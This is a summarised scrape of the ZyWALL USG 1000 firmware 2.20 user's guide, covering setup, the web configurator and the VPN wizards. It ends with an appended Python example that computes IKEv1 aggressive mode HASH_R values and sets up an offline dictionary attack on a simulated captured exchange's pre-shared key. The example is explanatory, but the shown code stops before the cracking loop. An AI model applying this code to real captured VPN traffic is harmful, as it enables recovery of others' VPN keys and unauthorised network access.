
www.zyxel.com


ZyWALL USG 1000
Unified Security Gateway

Copyright © 2010 ZyXEL Communications Corporation

Firmware Version 2.20
Edition 2, 9/2010

Default Login Details
LAN Port: P1
IP Address: https://192.168.1.1
User Name: admin
Password: 1234

Summary of Contents for ZyWALL 1050


Page 3: ...ssential terms used in the ZyWALL, what prerequisites are needed to configure a feature, and how to use that feature. It is highly recommended you read Chapter 7 on page 117 for ZyWALL application examples. Subsequent chapters are arranged by menu item as defined in the Web Configurator. Read each chapter carefully for detailed information on that menu item. To find specific information in this guide, us...

Page 4: ...ation from this link. Read the Tech Doc Overview to find out how to efficiently use the User Guide, Quick Start Guide and Command Line Interface Reference Guide in order to better understand how to use your product. Knowledge Base: If you have a specific question about your product, the answer may be here. This is a collection of answers to previously asked questions about ZyXEL products. Forum: This cont...

Page 5: ...al number. Warranty Information. Date that you received your device. Brief description of the problem and the steps you took to solve it. Disclaimer: Graphics in this book may differ slightly from the product due to differences in operating systems, operating system versions, or if you installed updated firmware/software for your device. Every effort has been made to ensure that the information in this ma...

Page 6: ... key stroke is denoted by square brackets and uppercase text; for example, [ENTER] means the enter or return key on your keyboard. "Enter" means for you to type one or more characters and then press the [ENTER] key. "Select" or "choose" means for you to use one of the predefined choices. A right angle bracket (>) within a screen name denotes a mouse click. For example, Maintenance > Log > Log Setting means you first click...

Page 7: ... User's Guide 7. Icons Used in Figures: Figures in this User's Guide may use the following generic icons. The ZyWALL icon is not an exact representation of your device. ZyWALL, Computer, Notebook computer, Server, Firewall, Telephone, Switch, Router ...

Page 8: ...rd, and do NOT place the product where anyone can walk on the power adaptor or cord. Do NOT use the device if the power adaptor or cord is damaged, as it might cause electrocution. If the power adaptor or cord is damaged, remove it from the device and the power source. Do NOT attempt to repair the power adaptor or cord; contact your local vendor to order a new one. Do not use the device outside, and make s...

Page 9: ...ical Reference 207; Dashboard 209; Monitor 223; Registration 265; Signature Update 271; Interfaces 277; Trunks 337; Policy and Static Routes 347; Routing Protocols 363; Zones 377; DDNS 381; NAT 387; HTTP Redirect 397; ALG 403; IP/MAC Binding 411; Authentication Policy 417; Firewall 425; IPSec VPN 443; SSL VPN 485; SSL User Screens 499; SSL User Application Screens 509; SSL User File Sharing 511; ZyWALL SecuExtender 519...

Page 10: ...ice HA 677; User/Group 699; Addresses 715; Services 721; Schedules 727; AAA Server 733; Authentication Method 743; Certificates 749; ISP Accounts 771; SSL Application 775; Endpoint Security 783; System 793; Log and Report 845; File Manager 863; Diagnostics 875; Reboot 885; Shutdown 887; Troubleshooting 889; Product Specifications 909 ...

Page 11: ...ounted Installation Procedure 34; 1.3 Front Panel 35; 1.3.1 Front Panel LEDs 35; 1.4 Management Overview 35; 1.5 Starting and Stopping the ZyWALL 37; Chapter 2 Features and Applications 39; 2.1 Features 39; 2.2 Applications 41; 2.2.1 VPN Connectivity 42; 2.2.2 SSL VPN Network Access 42; 2.2.3 User-Aware Access Control 44; 2.2.4 Multiple WAN Interfaces 44; 2.2.5 Device HA 45; Chapter 3 Web Configurator 47; 3.1 W...

Page 12: ...2.1 Choose an Ethernet Interface 76; 5.2.2 Select WAN Type 76; 5.2.3 Configure WAN Settings 77; 5.2.4 WAN and ISP Connection Settings 78; 5.2.5 Quick Setup Interface Wizard Summary 80; 5.3 VPN Quick Setup 81; 5.4 VPN Setup Wizard: Wizard Type 82; 5.5 VPN Express Wizard: Scenario 83; 5.5.1 VPN Express Wizard: Configuration 84; 5.5.2 VPN Express Wizard: Summary 85; 5.5.3 VPN Express Wizard: Finish 86; 5.5.4 VPN Ad...

Page 13: ...9 DDNS 105; 6.5.10 NAT 105; 6.5.11 HTTP Redirect 106; 6.5.12 ALG 107; 6.5.13 Auth. Policy 107; 6.5.14 Firewall 107; 6.5.15 IPSec VPN 108; 6.5.16 SSL VPN 108; 6.5.17 L2TP VPN 109; 6.5.18 Application Patrol 109; 6.5.19 Anti-Virus 110; 6.5.20 IDP 110; 6.5.21 ADP 110; 6.5.22 Content Filter 110; 6.5.23 Anti-Spam 111; 6.5.24 Device HA 111; 6.6 Objects 112; 6.6.1 User/Group 112; 6.7 System 113; 6.7.1 DNS, WWW, SSH, TELNET, FTP ...

Page 14: ...on Groups 140; 7.8 How to Use Endpoint Security and Authentication Policies 142; 7.8.1 Configure the Endpoint Security Objects 142; 7.8.2 Configure the Authentication Policy 144; 7.9 How to Configure Service Control 145; 7.9.1 Allow HTTPS Administrator Access Only From the LAN 146; 7.10 How to Allow Incoming H.323 Peer-to-peer Calls 148; 7.10.1 Turn On the ALG 149; 7.10.2 Set Up a NAT Policy For H.323 14...

Page 15: ...ng L2TP in Windows XP 183; 8.5.3 Configuring L2TP in Windows 2000 189; Part II: Technical Reference 207; Chapter 9 Dashboard 209; 9.1 Overview 209; 9.1.1 What You Can Do in this Chapter 209; 9.2 The Dashboard Screen 209; 9.2.1 The CPU Usage Screen 216; 9.2.2 The Memory Usage Screen 217; 9.2.3 The Session Usage Screen 218; 9.2.4 The VPN Status Screen 219; 9.2.5 The DHCP Table Screen 219; 9.2.6 The Number of Log...

Page 16: ...e Anti-Virus Statistics Screen 250; 10.16 The IDP Statistics Screen 252; 10.17 The Content Filter Statistics Screen 254; 10.18 Content Filter Cache Screen 255; 10.19 The Anti-Spam Statistics Screen 258; 10.20 The Anti-Spam Status Screen 260; 10.21 Log Screen 261; Chapter 11 Registration 265; 11.1 Overview 265; 11.1.1 What You Can Do in this Chapter 265; 11.1.2 What You Need to Know 265; 11.2 The Registration...

Page 17: ...uxiliary Interface 327; 13.8.1 Auxiliary Interface Overview 327; 13.8.2 Auxiliary 327; 13.9 Virtual Interfaces 329; 13.9.1 Virtual Interfaces Add/Edit 330; 13.10 Interface Technical Reference 331; Chapter 14 Trunks 337; 14.1 Overview 337; 14.1.1 What You Can Do in this Chapter 337; 14.1.2 What You Need to Know 338; 14.2 The Trunk Summary Screen 342; 14.3 Configuring a Trunk 343; 14.4 Trunk Technical Reference...

Page 18: ...t You Can Do in this Chapter 377; 17.1.2 What You Need to Know 378; 17.2 The Zone Screen 379; 17.3 Zone Edit 380; Chapter 18 DDNS 381; 18.1 DDNS Overview 381; 18.1.1 What You Can Do in this Chapter 381; 18.1.2 What You Need to Know 381; 18.2 The DDNS Screen 382; 18.2.1 The Dynamic DNS Add/Edit Screen 384; Chapter 19 NAT 387; 19.1 NAT Overview 387; 19.1.1 What You Can Do in this Chapter 387; 19.1.2 What You Nee...

Page 19: ...HCP Edit 414; 22.3 IP/MAC Binding Exempt List 415; Chapter 23 Authentication Policy 417; 23.1 Overview 417; 23.1.1 What You Can Do in this Chapter 417; 23.1.2 What You Need to Know 418; 23.2 Authentication Policy Screen 418; 23.2.1 Adding Exceptional Services 420; 23.2.2 Creating/Editing an Authentication Policy 421; Chapter 24 Firewall 425; 24.1 Overview 425; 24.1.1 What You Can Do in this Chapter 425; 24.1...

Page 20: ...entrator Add/Edit Screen 470; 25.5 IPSec VPN Background Information 471; Chapter 26 SSL VPN 485; 26.1 Overview 485; 26.1.1 What You Can Do in this Chapter 485; 26.1.2 What You Need to Know 485; 26.2 The SSL Access Privilege Screen 488; 26.2.1 The SSL Access Policy Add/Edit Screen 490; 26.3 The SSL Global Setting Screen 492; 26.3.1 How to Upload a Custom Logo 494; 26.4 Establishing an SSL VPN Connection 495 ...

Page 21: ...pend and Resume the Connection 521; 30.5 Stop the Connection 522; 30.6 Uninstalling the ZyWALL SecuExtender 522; Chapter 31 L2TP VPN 523; 31.1 Overview 523; 31.1.1 What You Can Do in this Chapter 523; 31.1.2 What You Need to Know 523; 31.2 L2TP VPN Screen 525; Chapter 32 Application Patrol 527; 32.1 Overview 527; 32.1.1 What You Can Do in this Chapter 527; 32.1.2 What You Need to Know 528; 32.1.3 Application ...

Page 22: ... Need To Know 569; 34.1.3 Before You Begin 570; 34.2 The IDP General Screen 571; 34.3 Introducing IDP Profiles 573; 34.3.1 Base Profiles 574; 34.4 The Profile Summary Screen 575; 34.5 Creating New Profiles 576; 34.5.1 Procedure To Create a New Profile 576; 34.6 Profiles: Packet Inspection 577; 34.6.1 Profile Group View Screen 577; 34.6.2 Policy Types 580; 34.6.3 IDP Service Groups 581; 34.6.4 Profile Query Vie...

Page 23: ... 36.1.1 What You Can Do in this Chapter 627; 36.1.2 What You Need to Know 627; 36.1.3 Before You Begin 629; 36.2 Content Filter General Screen 629; 36.3 Content Filter Policy Add or Edit Screen 632; 36.4 Content Filter Profile Screen 634; 36.5 Content Filter Categories Screen 634; 36.5.1 Content Filter Blocked and Warning Messages 646; 36.6 Content Filter Customization Screen 647; 36.7 Content Filter Techn...

Page 24: ...ce 685; 39.5 The Legacy Mode Screen 687; 39.6 Configuring the Legacy Mode Screen 688; 39.7 Device HA Technical Reference 692; Chapter 40 User/Group 699; 40.1 Overview 699; 40.1.1 What You Can Do in this Chapter 699; 40.1.2 What You Need To Know 699; 40.2 User Summary Screen 702; 40.2.1 User Add/Edit Screen 702; 40.3 User Group Summary Screen 705; 40.3.1 Group Add/Edit Screen 706; 40.4 Setting Screen 707; 40.4...

Page 25: ...creen 729; 43.2.2 The Recurring Schedule Add/Edit Screen 730; Chapter 44 AAA Server 733; 44.1 Overview 733; 44.1.1 Directory Service (AD/LDAP) 733; 44.1.2 RADIUS Server 734; 44.1.3 ASAS 734; 44.1.4 What You Can Do in this Chapter 734; 44.1.5 What You Need To Know 735; 44.2 Active Directory or LDAP Server Summary 737; 44.2.1 Adding an Active Directory or LDAP Server 737; 44.3 RADIUS Server Summary 739; 44.3.1 Ad...

Page 26: ...7.1 Overview 771; 47.1.1 What You Can Do in this Chapter 771; 47.2 ISP Account Summary 771; 47.2.1 ISP Account Edit 772; Chapter 48 SSL Application 775; 48.1 Overview 775; 48.1.1 What You Can Do in this Chapter 775; 48.1.2 What You Need to Know 775; 48.1.3 Example: Specifying a Web Site for Access 776; 48.2 The SSL Application Screen 777; 48.2.1 Creating/Editing a Web-based SSL Application Object 778; 48.2.2 ...

Page 27: ...50.7 WWW Overview 808; 50.7.1 Service Access Limitations 809; 50.7.2 System Timeout 809; 50.7.3 HTTPS 809; 50.7.4 Configuring WWW Service Control 810; 50.7.5 Service Control Rules 814; 50.7.6 Customizing the WWW Login Page 814; 50.7.7 HTTPS Example 818; 50.8 SSH 825; 50.8.1 How SSH Works 826; 50.8.2 SSH Implementation on the ZyWALL 827; 50.8.3 Requirements for Using SSH 827; 50.8.4 Configuring SSH 827; 50.8.5 ...

Page 28: ...ter 863; 52.1.2 What You Need to Know 863; 52.2 The Configuration File Screen 866; 52.3 The Firmware Package Screen 870; 52.4 The Shell Script Screen 872; Chapter 53 Diagnostics 875; 53.1 Overview 875; 53.1.1 What You Can Do in this Chapter 875; 53.2 The Diagnostic Screen 875; 53.2.1 The Diagnostics Files Screen 876; 53.3 The Packet Capture Screen 877; 53.3.1 The Packet Capture Files Screen 880; 53.3.2 Exampl...

Page 29: ...6; 56.2 Getting More Troubleshooting Help 907; Chapter 57 Product Specifications 909; 57.1 3G PCMCIA Card Installation 915; Appendix A Log Descriptions 917; Appendix B Common Services 977; Appendix C Displaying Anti-Virus Alert Messages in Windows 981; Appendix D Importing Certificates 987; Appendix E Open Software Announcements 1013; Appendix F Legal Information 1071; Index 1075 ...

Page 30: ...Table of Contents, ZyWALL USG 1000 User's Guide, 30 ...

Page 31: ...31 PART I: User's Guide ...

Page 33: ...stant Messaging (IM) and Peer-to-Peer (P2P) control, NAT, port forwarding, policy routing, DHCP server and many other powerful features. Flexible configuration helps you set up the network and enforce security policies efficiently. See Chapter 2 on page 39 for a more detailed overview of the ZyWALL's features. 1.2 Rack-mounted Installation: The ZyWALL can be mounted on an EIA standard-size 19-inch rack or in ...

Page 34: ... included bracket screws (smaller than the rack-mounting screws). 2. Attach the other bracket in a similar fashion. Figure 1 Attaching Mounting Brackets and Screws. 3. After attaching both mounting brackets, position the ZyWALL in the rack by lining up the holes in the brackets with the appropriate holes on the rack. Secure the ZyWALL to the rack with the rack-mounting screws. Figure 2 Rack Mounting ...

Page 35: ...rt the device (see Section 1.5 on page 37). If the LED turns red again, then please contact your vendor. SYS (Green): Off: The ZyWALL is not ready or has failed. On: The ZyWALL is ready and running. Flashing: The ZyWALL is restarting. AUX (Green): Off: The AUX port is not connected. Flashing: The AUX port is sending or receiving packets. On: The AUX port is connected. HDD (Green): Off: Reserved for future use. No hard disk i...

Page 36: ...se text-based commands to configure the ZyWALL. You can access it using remote management (for example, SSH or Telnet) or via the console port. See the Command Reference Guide for more information about the CLI. Console Port: You can use the console port to manage the ZyWALL using CLI commands. See the Command Reference Guide for more information about the CLI. The default settings for the console port are...

Page 37: ...Rebooting the ZyWALL: A warm start (without powering down and powering up again) occurs when you use the Reboot button in the Reboot screen or when you use the reboot command. The ZyWALL writes all cached data to the local storage, stops the system processes, and then does a warm start. Using the RESET button: If you press the RESET button, the ZyWALL sets the configuration to its default values and then r...

Page 38: ...Chapter 1 Introducing the ZyWALL, ZyWALL USG 1000 User's Guide, 38 ...

Page 39: ...des reliable, secure Internet access, set up one or more of the following: multiple WAN ports, and configure load balancing between these ports; one or more 3G (cellular) connections; an auxiliary (backup) Internet connection; a backup ZyWALL in the event the master ZyWALL fails (device HA). Virtual Private Networks (VPN): Use IPSec, SSL or L2TP VPN to provide secure communication between two sites over the Interne...

Page 40: ...n violations of protocol standards (RFCs, Requests for Comments); abnormal flows such as port scans. The ZyWALL's ADP protects against network-based intrusions. See Section 35.3.4 on page 610 and Section 35.3.5 on page 613 for more on the kinds of attacks that the ZyWALL can protect against. You can also create your own custom ADP rules. Bandwidth Management: Bandwidth management allows you to allocate net...

Page 41: ...cted of being used by spammers. Application Patrol: Application patrol (App Patrol) manages instant messenger (IM) and peer-to-peer (P2P) applications like MSN and BitTorrent. You can even control the use of a particular application's individual features (like text messaging, voice, video conferencing and file transfers). Application patrol has powerful bandwidth management, including traffic prioritization, to enhan...

Page 42: ...gure the ZyWALL to provide SSL VPN network access to remote users. There are two SSL VPN network access modes: reverse proxy and full tunnel. 2.2.2.1 Reverse Proxy Mode: In reverse proxy mode, the ZyWALL is a proxy that acts on behalf of the local network servers, such as your web and mail servers. As the final destination, the ZyWALL appears to be the server to remote users. This provides an added layer o...

Page 43: ...el mode, a virtual connection is created for remote users with private IP addresses in the same subnet as the local network. This allows them to access network resources in the same way as if they were part of the internal network. Figure 7 Network Access Mode: Full Tunnel Mode (figure labels: Web Mail, File Share, Web-based Application, LAN 192.168.1.X, https, Application S...)

Page 44: ...ormation and shared resources based on the user who is trying to access it. Figure 8 Applications: User-Aware Access Control. 2.2.4 Multiple WAN Interfaces: Set up multiple connections to the Internet on the same port, or set up multiple connections on different ports. In either case, you can balance the loads between them. Figure 9 Applications: Multiple WAN Interfaces ...

Page 45: ...ures and Applications, ZyWALL USG 1000 User's Guide, 45. 2.2.5 Device HA: Set up an additional ZyWALL as a backup gateway to ensure the default gateway is always available for the network. Figure 10 Applications: Device HA ...

Page 47: ...eb Configurator, you must: use Internet Explorer 7 or later, or Firefox 1.5 or later; allow pop-up windows (blocked by default in Windows XP Service Pack 2); enable JavaScript (enabled by default); enable Java permissions (enabled by default); enable cookies. The recommended screen resolution is 1024 x 768 pixels. 3.2 Web Configurator Access: 1. Make sure your ZyWALL hardware is properly connected. See the Quick St...

Page 48: ...d password (default 1234). If your account is configured to use an ASAS authentication server, use the OTP (One-Time Password) token to generate a number. Enter it in the One-Time Password field. The number is only good for one login. You must use the token to generate a new number the next time you log in. 4. Click Login. If you logged in using the default user name and password, the Update Admin Info screen ...

Page 49: ...is screen. If you change the default password, the Login screen (Figure 11 on page 48) appears after you click Apply. If you click Ignore, the Installation Setup Wizard opens if the ZyWALL is using its default configuration (see Chapter 4 on page 65); otherwise, the dashboard appears as shown next. Figure 13 Dashboard. 3.3 Web Configurator Screens Overview: The Web Configurator screen is divided into these par...

Page 50: ...t of the Web Configurator. Help: Click this to open the help page for the current screen. About: Click this to display basic information about the ZyWALL. Site Map: Click this to see an overview of links to the Web Configurator screens. Object Reference: Click this to open a screen where you can check which configuration items reference an object. Console: Click this to open the console, in which you can use...

Page 51: ... menus and their screens. Figure 16 Navigation Panel. 3.3.2.1 Dashboard: The dashboard displays general device information, system status, system resource usage, licensed service status and interface status in widgets that you can re-arrange to suit your needs. See Chapter 9 on page 209 for details on the dashboard. Table 5 About (LABEL / DESCRIPTION). Boot Module: This shows the version number of the software ...

Page 52: ... clients. Cellular Status: Displays details about the ZyWALL's 3G connection status. USB Storage: Displays information about a connected USB storage device. AppPatrol Statistics: Displays bandwidth and protocol statistics. VPN Monitor > IPSec: Displays and manages the active IPSec SAs. SSL: Lists users currently logged into the VPN SSL client portal. You can also log out individual users and delete related ses...

Page 53: ... port groups. Ethernet: Manage Ethernet interfaces and virtual Ethernet interfaces. PPP: Create and manage PPPoE and PPTP interfaces. Cellular: Configure a cellular Internet connection for an installed 3G card. VLAN: Create and manage VLAN interfaces and virtual VLAN interfaces. Bridge: Create and manage bridges and virtual bridge interfaces. Auxiliary: Manage the AUX port. Trunk: Create and manage trunks for l...

Page 54: ...TP Over IPSec VPN settings. AppPatrol > General: Enable or disable traffic management by application and see registration and signature information. Common: Manage traffic of the most commonly used web, file transfer and e-mail protocols. IM: Manage instant messenger traffic. Peer-to-Peer: Manage peer-to-peer traffic. VoIP: Manage VoIP traffic. Streaming: Manage streaming traffic. Other: Manage other kinds of traf...

Page 55: ... Group: Create and manage groups of users. Setting: Manage default settings for all users, general settings for user sessions, and rules to force user authentication. Address > Address: Create and manage host, range, and network (subnet) addresses. Address Group: Create and manage groups of addresses. Service > Service: Create and manage TCP and UDP services. Service Group: Create and manage groups of services. Schedul...

Page 56: ... HTTPS and general authentication. Login Page: Configure how the login and access user screens look. SSH: Configure SSH server and SSH service settings. TELNET: Configure telnet server settings for the ZyWALL. FTP: Configure FTP server settings. SNMP: Configure SNMP communities and services. Dial-in Mgmt: Configure settings for an out-of-band management connection through a modem connected to the AUX port. Van...

Page 57: ...ages, such as those resulting from misconfiguration, display in a popup window. Figure 17 Warning Message. Table 8 Maintenance Menu Screens Summary (FOLDER OR LINK / TAB / FUNCTION). File Manager > Configuration File: Manage and upload configuration files for the ZyWALL. Firmware Package: View the current firmware version and upload firmware. Shell Script: Manage and run shell script files for the ZyWALL. Diagnos...

Page 58: ...een. Figure 18 Site Map. 3.3.3.3 Object Reference: Click Object Reference to open the Object Reference screen. Select the type of object and the individual object, and click Refresh to show which configuration settings reference the object. The following example shows which configuration settings reference the ldap-users user object (in this case, the first firewall rule). Figure 19 Object Reference ...

Page 59: ...EL / DESCRIPTION. Object Name: This identifies the object for which the configuration settings that use it are displayed. Click the object's name to display the object's configuration screen in the main window. This field is a sequential value, and it is not associated with any entry. Service: This is the type of setting that references the selected object. Click a service's name to display the service's co...

Page 60: ...y a Column's Criteria. 2. Click the down arrow next to a column heading for more options about how to display the entries. The options available vary depending on the type of fields in the column. Here are some examples of what you can do: sort in ascending alphabetical order; sort in descending (reverse) alphabetical order; select which columns to display; group entries by field; show entries in groups; filt...

Page 61: ...umn heading and drag and drop it to change the column order. A green check mark displays next to the column's title when you drag the column to a valid new location. Figure 24 Changing the Column Order. 5. Use the icons and fields at the bottom of the table to navigate to different pages of entries and control how many entries display at a time. Figure 25 Navigating Pages of Table Entries ...

Page 62: ...ick Edit to open a screen where you can modify the entry's settings. In some tables you can just click a table entry and edit it directly in the table. For those types of tables, small red triangles display for table entries with changes that you have not yet applied. Remove: To remove an entry, select it and click Remove. The ZyWALL confirms you want to remove it before doing so. Activate: To turn on an e...

Page 63: ...r 3 Web Configurator, ZyWALL USG 1000 User's Guide, 63 ...you can also use the Shift or Ctrl key to select multiple entries and then use the arrow button to move them to the other list. Figure 27 Working with Lists ...

Page 65: ...ure Internet connection settings and activate subscription services. This chapter provides information on configuring the Web Configurator's installation setup wizard. See the feature-specific chapters in this User's Guide for background information. Figure 28 Installation Setup Wizard. Click the double arrow in the upper right corner to display or hide the help. Click Go to Dashboard to skip the insta...

Page 66: ...o Internet connections. Leave it cleared to configure just one. This option appears when you are configuring the first WAN interface. Encapsulation: Choose the Ethernet option when the WAN port is used as a regular Ethernet. Otherwise, choose PPPoE or PPTP for a dial-up connection according to the information from your ISP. WAN Interface: This is the interface you are configuring for Internet access. Zone: ...

Page 67: ...reen. The following fields display if you selected static IP address assignment. IP Subnet Mask: Enter the subnet mask for this WAN connection's IP address. Gateway IP Address: Enter the IP address of the router through which this WAN connection will send traffic (the default gateway). First / Second DNS Server: These fields display if you selected static IP address assignment. The Domain Name System (DNS) maps...

Page 68: ...r outgoing connection requests. Options are: CHAP/PAP: Your ZyWALL accepts either CHAP or PAP when requested by the remote node. CHAP: Your ZyWALL accepts CHAP only. PAP: Your ZyWALL accepts PAP only. MSCHAP: Your ZyWALL accepts MSCHAP only. MSCHAP-V2: Your ZyWALL accepts MSCHAP-V2 only. Type the User Name given to you by your ISP. You can use alphanumeric and _ characters, and it can be up to 31 characters lon...

Page 69: ...in name to an IP address and vice versa. Enter a DNS server's IP address(es). The DNS server is extremely important because without it you must know the IP address of a computer before you can access it. The ZyWALL uses these (in the order you specify here) to resolve domain names for VPN, DDNS and the time server. Leave the field as 0.0.0.0 if you do not want to configure DNS servers. If you do not config...

Page 70: ...SP (if given). Server IP: Type the IP address of the PPTP server. Type a Connection ID or connection name. It must follow the "c:id" and "n:name" format. For example, C:12 or N:My ISP. This field is optional and depends on the requirements of your broadband modem or router. You can use alphanumeric and _ characters, and it can be up to 31 characters long. 4.1.5.2 WAN IP Address Assignments: First WAN Interface: Thi...

Page 71: ...cond WAN Interface: The screens for configuring the second WAN interface are similar to the first (see Section 4.1.1 on page 66). Figure 33 Internet Access: Step 3 Second WAN Interface. 4.1.7 Internet Access Finish: You have set up your ZyWALL to access the Internet. After configuring the WAN interface(s), a screen displays with your settings. If they are not correct, click Back. Figure 34 Internet Access: Ethe...

Page 72: ...n: Use this screen to register your ZyWALL with myZyXEL.com and activate trial periods of subscription security features if you have not already done so. If the ZyWALL is already registered, this screen displays your user name and which trial services are activated (if any). You can still activate any un-activated trial services. Note: You must be connected to the Internet to register. Use the Registration ...

Page 73: ...rd: Use six to 20 alphanumeric characters and the underscore. Spaces are not allowed. Type it again in the Confirm Password field. E-Mail Address: Enter your e-mail address. Use up to 80 alphanumeric characters (periods and the underscore are also allowed) without spaces. Country Code: Select your country from the drop-down box list. Trial Service Activation: You can try a trial service subscription. The trial...

Page 74: ...Chapter 4 Installation Setup Wizard, ZyWALL USG 1000 User's Guide, 74 ...

Page 75: ...this User's Guide for background information. In the Web Configurator, click Configuration > Quick Setup to open the first Quick Setup screen. Figure 37 Quick Setup. WAN Interface: Click this link to open a wizard to set up a WAN (Internet) connection. This wizard creates matching ISP account settings in the ZyWALL if you use PPPoE or PPTP. See Section 5.2 on page 76. VPN SETUP: Use VPN SETUP to configure a VP...

Page 76: ...e an interface to connect to the Internet. Click Next. Figure 38 WAN Interface Quick Setup Wizard. 5.2.1 Choose an Ethernet Interface: Select the Ethernet interface that you want to configure for a WAN connection and click Next. Figure 39 Choose an Ethernet Interface. 5.2.2 Select WAN Type: WAN Type Selection: Select the type of encapsulation this connection is to use. Choose Ethernet when the WAN port is ...

Page 77: ...tion provided by your ISP to know what to enter in each field. Leave a field blank if you don't have that information. Note: Enter the Internet access information exactly as your ISP gave it to you. 5.2.3 Configure WAN Settings: Use this screen to select to which zone the interface belongs and whether the interface should use a fixed or dynamic IP address. Figure 41 WAN Interface Setup: Step 2 WAN Interf...

Page 78: ...s. This screen is read-only if you set the IP Address Assignment to Static. Note: Enter the Internet access information exactly as your ISP gave it to you. Figure 42 WAN and ISP Connection Settings (PPTP Shown). The following table describes the labels in this screen. Table 11 WAN and ISP Connection Settings (LABEL / DESCRIPTION). ISP Parameter: This section appears if the interface uses a PPPoE or PPTP Interne...

Page 79: ...TP Configuration: This section only appears if the interface uses a PPPoE or PPTP Internet connection. Base Interface: This displays the identity of the Ethernet interface you configure to connect with a modem or router. Base IP Address: Type the static IP address assigned to you by your ISP. IP Subnet Mask: Type the subnet mask assigned to you by your ISP (if given). Server IP: Type the IP address of the PP...

Page 80: ... to access it. DNS (Domain Name System) is for mapping a domain name to its corresponding IP address and vice versa. The DNS server is extremely important because without it you must know the IP address of a computer before you can access it. The ZyWALL uses a system DNS server (in the order you specify here) to resolve domain names for VPN, DDNS and the time server. Back: Click Back to return to the previo...

Page 81: ...ection will not time out. Yes means the ZyWALL uses the idle timeout. Idle Timeout: This is how many seconds the connection can be idle before the router automatically disconnects from the PPPoE server. 0 means no timeout. Connection ID: If you specified a connection ID, it displays here. WAN Interface: This identifies the interface you configure to connect with your ISP. Zone: This field displays to which s...

Page 82: ...lect which type of VPN connection you want to configure. Figure 45 VPN Setup Wizard: Wizard Type. Express: Use this wizard to create a VPN connection with another ZLD-based ZyWALL using a pre-shared key and default security settings. Advanced: Use this wizard to configure detailed VPN security settings, such as using certificates. The VPN connection can be to another ZLD-based ZyWALL or other IPSec device...

Page 83: ...figure on the left of the screen changes to match the scenario you select. Site-to-site: Choose this if the remote IPSec device has a static IP address or a domain name. This ZyWALL can initiate the VPN tunnel. Site-to-site with Dynamic Peer: Choose this if the remote IPSec device has a dynamic IP address. Only the remote IPSec device can initiate the VPN tunnel. Remote Access (Server Role): Choose this to ...

Page 84: ... use the same password. Use 8 to 31 case-sensitive ASCII characters, or 8 to 31 pairs of hexadecimal (0-9, A-F) characters. Precede a hexadecimal key with 0x. You will receive a PYLD_MALFORMED (payload malformed) packet if the same pre-shared key is not used on both ends. Local Policy (IP/Mask): Type the IP address of a computer on your network. You can also specify a subnet. This must match the remote IP addres...

Page 85: ...iation. Local Policy: Static IP address and subnet mask of the computers on the network behind your ZyWALL that can use the tunnel. Remote Policy: Static IP address and subnet mask of the computers on the network behind the remote IPSec device that can use the tunnel. If this field displays Any, only the remote IPSec device can initiate the VPN connection. Copy and paste the Configuration for Secure Gate...

Page 86: ... Express Wizard Finish Now you can use the VPN tunnel Figure 49 VPN Express Wizard Step 6 Note If you have not already done so use the myZyXEL com link and register your ZyWALL with myZyXEL com and activate trials of services like IDP Click Close to exit the wizard ...

Page 87: ...Select the scenario that best describes your intended VPN connection The figure on the left of the screen changes to match the scenario you select Site to site Choose this if the remote IPSec device has a static IP address or a domain name This ZyWALL can initiate the VPN tunnel Site to site with Dynamic Peer Choose this if the remote IPSec device has a dynamic IP address Only the remote IPSec dev...

Page 88: ...re gateway to identify the remote IPSec device by its IP address or a domain name. Use 0.0.0.0 if the remote IPSec device has a dynamic WAN IP address. My Address (interface): Select an interface from the drop-down list box to use on your ZyWALL. Negotiation Mode: Select Main for identity protection. Select Aggressive to allow more incoming connections from dynamic IP addresses to use separate passwords. Be aware that aggressive mode sends the identities and the pre-shared-key-based authentication hash unencrypted, so anyone who captures a single exchange can test candidate keys offline; only use it with long, random pre-shared keys. N...
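
The two points above (the pre-shared key format rules on page 84 and the aggressive mode caveat on page 88) as an added worked example; this is example code written for this page, not code from the ZyWALL manual or firmware. It checks a key against the page 84 rules, then computes HASH_R exactly as RFC 2409 defines it for pre-shared-key authentication and runs a dictionary attack against a constructed aggressive mode exchange. The nonces, cookies, SA body and Diffie-Hellman public values are random filler standing in for a captured packet pair, HMAC-SHA1 is assumed as the negotiated prf, "printable" ASCII is an assumed reading of the manual's "ASCII characters", and the word list is constructed:

```python
"""Pre-shared key format check (page 84) and offline attack on an IKEv1
aggressive mode exchange (page 88). Added example, not from the manual."""
import hashlib
import hmac
import os
import re
from typing import Optional

# Page 84: 8-31 case-sensitive ASCII characters, or "0x" plus 8-31 hex pairs.
_HEX_PSK = re.compile(r"^0x((?:[0-9A-Fa-f]{2}){8,31})$")


def parse_psk(psk: str) -> bytes:
    """Return the raw key bytes, or raise ValueError if the key breaks the rules."""
    m = _HEX_PSK.match(psk)
    if m:
        return bytes.fromhex(m.group(1))
    # Printable ASCII is an assumption; the manual only says "ASCII characters".
    if 8 <= len(psk) <= 31 and all(0x20 <= ord(c) < 0x7F for c in psk):
        return psk.encode("ascii")
    raise ValueError("PSK must be 8-31 printable ASCII chars or 0x plus 8-31 hex pairs")


def is_valid_psk(psk: str) -> bool:
    try:
        parse_psk(psk)
        return True
    except ValueError:
        return False


def skeyid(psk: bytes, ni: bytes, nr: bytes) -> bytes:
    """RFC 2409 section 5.4 (pre-shared keys): SKEYID = prf(psk, Ni_b | Nr_b).
    prf is HMAC-SHA1 here, assuming the phase 1 proposal negotiated SHA1."""
    return hmac.new(psk, ni + nr, hashlib.sha1).digest()


def hash_r(psk: bytes, x: dict) -> bytes:
    """RFC 2409 section 5: HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b).
    In aggressive mode the responder sends this in message 2 without encryption."""
    msg = x["g_xr"] + x["g_xi"] + x["cky_r"] + x["cky_i"] + x["sai_b"] + x["idir_b"]
    return hmac.new(skeyid(psk, x["ni"], x["nr"]), msg, hashlib.sha1).digest()


def capture_aggressive_exchange(psk: bytes) -> dict:
    """Constructed stand-in for a sniffed aggressive mode exchange. Every field
    except the PSK is visible on the wire; the DH values are random filler of
    the right size rather than real group 2 elements."""
    x = {
        "g_xi": os.urandom(128), "g_xr": os.urandom(128),    # 1024-bit DH public values
        "cky_i": os.urandom(8), "cky_r": os.urandom(8),      # ISAKMP cookies
        "ni": os.urandom(20), "nr": os.urandom(20),          # nonces
        "sai_b": b"\x00\x00\x00\x01" + os.urandom(40),       # initiator SA payload body
        "idir_b": b"\x01\x00\x00\x00" + bytes([1, 2, 3, 4]),  # ID_IPV4_ADDR 1.2.3.4 (manual's WAN address)
    }
    x["hash_r"] = hash_r(psk, x)
    return x


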